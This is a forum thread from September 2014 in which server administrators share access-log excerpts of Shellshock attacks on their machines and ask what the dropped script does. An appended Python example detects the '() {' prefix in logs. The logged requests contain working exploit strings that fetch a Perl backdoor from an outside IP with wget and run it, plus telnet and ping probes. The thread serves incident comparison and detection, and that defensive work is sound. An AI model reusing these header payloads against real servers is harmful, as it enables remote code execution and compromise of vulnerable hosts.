1
20150517 2014-09-26 19:28:48 +08:00 via Android
I've been hit by a trojan.
|
2
LazyZhu 2014-09-26 19:33:11 +08:00
http://193.2.50.126/stuff/linux/dbot.txt
|
3
kingwkb 2014-09-26 20:16:46 +08:00
I checked, and they are indeed there.
54.251.83.67 - - [26/Sep/2014:13:42:09 +0800] "GET / HTTP/1.1" 200 2664 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET / HTTP/1.0" 200 2664 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /test-cgi/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
74.201.85.77 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/php HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22"
|
4
xd547 2014-09-26 20:19:42 +08:00
Looks like mine got scanned too.
$ sudo cat * |grep bash
209.126.230.72 - - [25/Sep/2014:14:10:39 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
114.91.107.58 - - [26/Sep/2014:00:54:00 +0800] "GET / HTTP/1.1" 301 178 "-" "() { :;}; /bin/bash -c \x22telnet 197.242.148.29 9999\x22"
198.46.135.194 - - [26/Sep/2014:03:15:06 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 3 198.46.158.94" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
|
5
janxin 2014-09-26 20:51:48 +08:00
Looks like it just ran a backdoor Perl script...
|
6
arcas 2014-09-26 20:53:25 +08:00
E486: 找不到模式: bash
|
7
binux 2014-09-26 20:56:48 +08:00
74.201.85.67 - - [26/Sep/2014:14:37:00 +0400] "GET /cgi-bin/test.sh HTTP/1.0" 500 192 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/wow1\x22" "-"
I have it too, and from a nearby IP at that.
|
8
binux 2014-09-26 21:01:33 +08:00
There are also people doing this...
209.126.230.72 - - [25/Sep/2014:10:24:48 +0400] "GET / HTTP/1.0" 500 192 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" "-"
|
9
fanta 2014-09-27 01:34:54 +08:00
That server seems to have been shut down; wow1 can't be reached anymore.
|
10
chijiao 2014-09-27 10:17:27 +08:00
Mine got scanned too; my solution is to use squid as a proxy.
|
11
sorcerer 2014-09-28 11:11:05 +08:00
This script was run on mine too. Can someone tell me what exactly the script does, so I can take the appropriate action?
|
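Added example, not written by any participant in this thread: a log check that looks for the `() {` function-definition prefix in the request line and every quoted header field, rather than grepping for the word `bash`, which misses the ping-style probes and matches harmless URLs. The `SAMPLE` lines are constructed with documentation addresses, and the function and field names are this example's own.

```python
import re

# Combined log format; nginx-style lines may carry extra quoted fields at the end.
LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+(?P<rest>.*)$'
)
QUOTED = re.compile(r'"([^"]*)"')
# Prefix that makes a vulnerable bash treat a header value as a function definition.
SHELLSHOCK = re.compile(r'\(\)\s*\{')


def find_probes(lines):
    """Return one dict per request that carries '() {' in any logged field."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not an access-log line in the expected format
        request = m.group("request")
        fields = [request] + QUOTED.findall(m.group("rest"))
        payloads = [f for f in fields if SHELLSHOCK.search(f)]
        if payloads:
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "path": request.split(" ")[1] if " " in request else "",
                "status": int(m.group("status")),
                # nginx logs a double quote inside a field as \x22
                "payload": payloads[0].replace("\\x22", '"'),
            })
    return hits


# Constructed sample lines (not taken from any real server).
SAMPLE = [
    r'192.0.2.10 - - [26/Sep/2014:15:26:30 +0800] "GET /cgi-bin/test.sh HTTP/1.0" 404 162 "-" "() { :;}; /bin/bash -c \x22echo probe\x22"',
    r'192.0.2.11 - - [25/Sep/2014:14:10:39 +0800] "GET / HTTP/1.0" 301 178 "() { :; }; ping -c 3 198.51.100.7" "scanner"',
    r'192.0.2.12 - - [26/Sep/2014:16:00:00 +0800] "GET /bash-tutorial.html HTTP/1.1" 200 2664 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_probes(SAMPLE):
        print(hit["time"], hit["ip"], hit["status"], hit["path"], hit["payload"])
```

The second sample line contains no `bash` at all and the third contains it only in a page name, so `grep bash` gets both wrong while the prefix match flags only the first two.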